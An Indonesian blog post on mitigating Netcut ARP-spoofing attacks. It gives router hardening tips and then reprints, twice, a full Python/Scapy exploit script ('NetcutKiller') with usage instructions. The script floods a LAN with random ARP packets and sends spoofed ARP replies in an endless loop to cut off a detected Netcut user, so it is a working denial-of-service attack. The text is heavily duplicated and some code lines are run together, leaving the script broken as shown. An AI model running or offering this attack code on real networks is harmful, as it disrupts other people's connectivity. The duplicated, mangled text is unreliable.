Sebenernya topologi jaringan juga sangat berpengaruh untuk mengurangi serangan netcut, Mencegah AP dan Klien dalam satu jaringan wireless untuk saling berkomunikasi. dengan menceklist fiture enable client isolation
kemudian untuk radio yang lain tinggal diubek ubek saja..
langkah ke 2
kita harus membuat fake gateway
fungsinya salah membaca konfigurasi jaringan dan tidak bisa meng-cut gateway.
langkah-langkah cara pembuatan fake gateway, ini cuma baru ditester di router mikrotik, untuk router yang lain menyesuaikan
http://forum.mikrotik.com/viewtopic.php?f=2&t=50318 |
masih bingung juga ?
unduh videonya
ukuran 7.2 MB
http://www.mediafire.com/?l3da7ddfo9tu9j2
langkah ke 3 DROP ICMP paket /ping
kayaknya terlalu ribet nanti clientnya kalo ini didisable , optional aja deh
langkah ke 4 , gunakan router yang powerfull seperti mikrotik / pfsense, clearOS dll, karena sekarang banyak router - router murah meriah dipasaran tetapi router itu kurang recomended untuk dibeli
langkah ke 5 gunakan PPPOE server untuk koneksi ke internet , mungkin hal ini masih jarang digunakan karena kita harus berada pada signal wifi yang cukup baik untuk bisa berkomunikasi, dan installasinya yang rumit untuk client.
itu untuk posisi kita sebagai Network Admin , kalau posisi kita berada pada client , maybe hal yg bisa kita lakukan adalah mengunduh software2 anti-netcut
seperti http://www.mediafire.com/?onouyj315jh
unduh videonya
ukuran 7.2 MB
http://www.mediafire.com/?l3da7ddfo9tu9j2
langkah ke 3 DROP ICMP paket /ping
kayaknya terlalu ribet nanti clientnya kalo ini didisable , optional aja deh
langkah ke 4 , gunakan router yang powerfull seperti mikrotik / pfsense, clearOS dll, karena sekarang banyak router - router murah meriah dipasaran tetapi router itu kurang recomended untuk dibeli
langkah ke 5 gunakan PPPOE server untuk koneksi ke internet , mungkin hal ini masih jarang digunakan karena kita harus berada pada signal wifi yang cukup baik untuk bisa berkomunikasi, dan installasinya yang rumit untuk client.
itu untuk posisi kita sebagai Network Admin , kalau posisi kita berada pada client , maybe hal yg bisa kita lakukan adalah mengunduh software2 anti-netcut
seperti http://www.mediafire.com/?onouyj315jh
#!/usr/bin/env python
#Exploit Title: Netcut Denial of Service Vulnerability
#Author: MaYaSeVeN
#Greetz: Inj3ct0r 1337day Exploit DataBase (1337day.com)
#Blog: http://mayaseven.blogspot.com
#PoC: Video http://www.youtube.com/user/mayaseven
#Picture http://3.bp.blogspot.com/-GcwpOXx7ers/TwGVoyj8SmI/AAAAAAAAAxs/wSGL1tKGflc/s1600/a.png
#Version: Netcut 2
#Software Link: http://www.mediafire.com/?jiiyq2wcpp41266
#Tested on: Windows Xp, Windows 7
#Greetz : ZeQ3uL, c1ph3r, x-c0d3, p3lo, Retool2, Gen0TypE, Windows98SE, Sumedt, Rocky Sharma
from scapy.all import sniff,Ether,ARP,RandIP,RandMAC,Padding,sendp,conf
import commands,os,sys
#gw_mac = commands.getoutput("arp -i %s | grep %s" % (conf.iface,conf.iface)).split()[2]
gw_ip = commands.getoutput("ip route list | grep default").split()[2]
def protect(gw_ip,gw_mac):
os.popen("arp -s %s %s" %(gw_ip,gw_mac))
print "Protected himself"
def detect():
ans = sniff(filter='arp',timeout=7)
target=[]
for r in ans.res:
target.append(r.sprintf("%ARP.pdst% %ARP.hwsrc% %ARP.psrc%"))
return target
def preattack(gw_ip):
num = []
count = 0
target = 0
temp = 0
print "Detecting..."
d = detect()
for i in range(len(d)):
if d[i].split()[0] == "255.255.255.255":
num.append(d.count(d[i]))
if d.count(d[i]) > count:
count = d.count(d[i])
target = i
if d[i].split()[0] == gw_ip:
temp += 1
if len(d) < 7: print "[-] No one use Netcut or try again" exit() if len(num)*7 < temp: num[:] = [] count = 0 result = float(temp)/len(d)*100 for j in range(len(d)): if d[i].split()[0] == gw_ip: num.append(d.count(d[j])) if d.count(d[i]) > count:
count = d.count(d[i])
target = i
num.reverse()
result = float(temp)/len(d)*100
print target
else:
num.reverse()
result = float(num[0]+temp)/len(d)*100
print "There is a possibility that " + str(result) + "%"
if result>= 50:
target_mac = d[target].split()[1]
target_ip = d[target].split()[2]
print "[+]Detected, Netcut using by IP %s MAC %s" %(target_ip,target_mac)
attack(target_mac,target_ip,gw_ip)
else:
print "[-] No one use Netcut or try again"
def attack(target_mac,target_ip,gw_ip):
print "[+]Counter Attack !!!"
e = Ether(dst="FF:FF:FF:FF:FF:FF")
while 1:
a = ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hwdst=RandMAC(),op=1)
p = e/a/Padding("\x00"*18)
sendp(p,verbose=0)
a1 = ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwdst=target_mac,op=2)
p1 = e/a1/Padding("\x00"*18)
sendp(p1,verbose=0)
if __name__ == '__main__':
os.system("clear")
print "###################################################"
print " __ __ __ __ _____ __ __ _ _"
print "| \/ | \ \ / / / ____| \ \ / / | \ | |"
print "| \ / | __ \ \_/ /_ _| (___ __\ \ / /__| \| |"
print "| |\/| |/ _\ \ / _\ |\___ \ / _ \ \/ / _ \ . \ |"
print "| | | | (_| || | (_| |____) | __/\ / __/ |\ |"
print "|_| |_|\__,_||_|\__,_|_____/ \___| \/ \___|_| \_|"
print " "
print "###################################################"
print ""
print "http://mayaseven.blogspot.com"
print ""
if len(sys.argv) == 2 or len(sys.argv) == 3:
if len(sys.argv) == 2:
conf.iface=sys.argv[1]
preattack(gw_ip)
if len(sys.argv) == 3:
conf.iface=sys.argv[1]
gw_mac = sys.argv[2]
protect(gw_ip,gw_mac)
preattack(gw_ip)
else:
print '''Mode:
1.)Attack only
Usage: NetcutKiller
e.g. NetcutKiller.py wlan0
2.)Attack with protect himself
Usage: NetcutKiller
e.g. NetcutKiller.py wlan0 00:FA:77:AA:BC:AF
'''
# 1337day.com [2012-01-04]
#Exploit Title: Netcut Denial of Service Vulnerability
#Author: MaYaSeVeN
#Greetz: Inj3ct0r 1337day Exploit DataBase (1337day.com)
#Blog: http://mayaseven.blogspot.com
#PoC: Video http://www.youtube.com/user/mayaseven
#Picture http://3.bp.blogspot.com/-GcwpOXx7ers/TwGVoyj8SmI/AAAAAAAAAxs/wSGL1tKGflc/s1600/a.png
#Version: Netcut 2
#Software Link: http://www.mediafire.com/?jiiyq2wcpp41266
#Tested on: Windows Xp, Windows 7
#Greetz : ZeQ3uL, c1ph3r, x-c0d3, p3lo, Retool2, Gen0TypE, Windows98SE, Sumedt, Rocky Sharma
from scapy.all import sniff,Ether,ARP,RandIP,RandMAC,Padding,sendp,conf
import commands,os,sys
#gw_mac = commands.getoutput("arp -i %s | grep %s" % (conf.iface,conf.iface)).split()[2]
gw_ip = commands.getoutput("ip route list | grep default").split()[2]
def protect(gw_ip,gw_mac):
os.popen("arp -s %s %s" %(gw_ip,gw_mac))
print "Protected himself"
def detect():
ans = sniff(filter='arp',timeout=7)
target=[]
for r in ans.res:
target.append(r.sprintf("%ARP.pdst% %ARP.hwsrc% %ARP.psrc%"))
return target
def preattack(gw_ip):
num = []
count = 0
target = 0
temp = 0
print "Detecting..."
d = detect()
for i in range(len(d)):
if d[i].split()[0] == "255.255.255.255":
num.append(d.count(d[i]))
if d.count(d[i]) > count:
count = d.count(d[i])
target = i
if d[i].split()[0] == gw_ip:
temp += 1
if len(d) < 7: print "[-] No one use Netcut or try again" exit() if len(num)*7 < temp: num[:] = [] count = 0 result = float(temp)/len(d)*100 for j in range(len(d)): if d[i].split()[0] == gw_ip: num.append(d.count(d[j])) if d.count(d[i]) > count:
count = d.count(d[i])
target = i
num.reverse()
result = float(temp)/len(d)*100
print target
else:
num.reverse()
result = float(num[0]+temp)/len(d)*100
print "There is a possibility that " + str(result) + "%"
if result>= 50:
target_mac = d[target].split()[1]
target_ip = d[target].split()[2]
print "[+]Detected, Netcut using by IP %s MAC %s" %(target_ip,target_mac)
attack(target_mac,target_ip,gw_ip)
else:
print "[-] No one use Netcut or try again"
def attack(target_mac,target_ip,gw_ip):
print "[+]Counter Attack !!!"
e = Ether(dst="FF:FF:FF:FF:FF:FF")
while 1:
a = ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hwdst=RandMAC(),op=1)
p = e/a/Padding("\x00"*18)
sendp(p,verbose=0)
a1 = ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwdst=target_mac,op=2)
p1 = e/a1/Padding("\x00"*18)
sendp(p1,verbose=0)
if __name__ == '__main__':
os.system("clear")
print "###################################################"
print " __ __ __ __ _____ __ __ _ _"
print "| \/ | \ \ / / / ____| \ \ / / | \ | |"
print "| \ / | __ \ \_/ /_ _| (___ __\ \ / /__| \| |"
print "| |\/| |/ _\ \ / _\ |\___ \ / _ \ \/ / _ \ . \ |"
print "| | | | (_| || | (_| |____) | __/\ / __/ |\ |"
print "|_| |_|\__,_||_|\__,_|_____/ \___| \/ \___|_| \_|"
print " "
print "###################################################"
print ""
print "http://mayaseven.blogspot.com"
print ""
if len(sys.argv) == 2 or len(sys.argv) == 3:
if len(sys.argv) == 2:
conf.iface=sys.argv[1]
preattack(gw_ip)
if len(sys.argv) == 3:
conf.iface=sys.argv[1]
gw_mac = sys.argv[2]
protect(gw_ip,gw_mac)
preattack(gw_ip)
else:
print '''Mode:
1.)Attack only
Usage: NetcutKiller
e.g. NetcutKiller.py wlan0
2.)Attack with protect himself
Usage: NetcutKiller
e.g. NetcutKiller.py wlan0 00:FA:77:AA:BC:AF
'''
# 1337day.com [2012-01-04]
Netcut 2.0 Denial of service
python filenameexploit.py [ethernet] [macaddress], contoh: python netcutkiller.py eth0 CC:CC:CC:CC:CC:CC
http://1337day.com/exploits/17338
python filenameexploit.py [ethernet] [macaddress], contoh: python netcutkiller.py eth0 CC:CC:CC:CC:CC:CC
http://1337day.com/exploits/17338
NB : Langkah langkah diatas bukan menangkal serangan netcut , mungkin hanya mengurangi dampaknya
SOURCE
0 komentar
Tambahkan Komentar Anda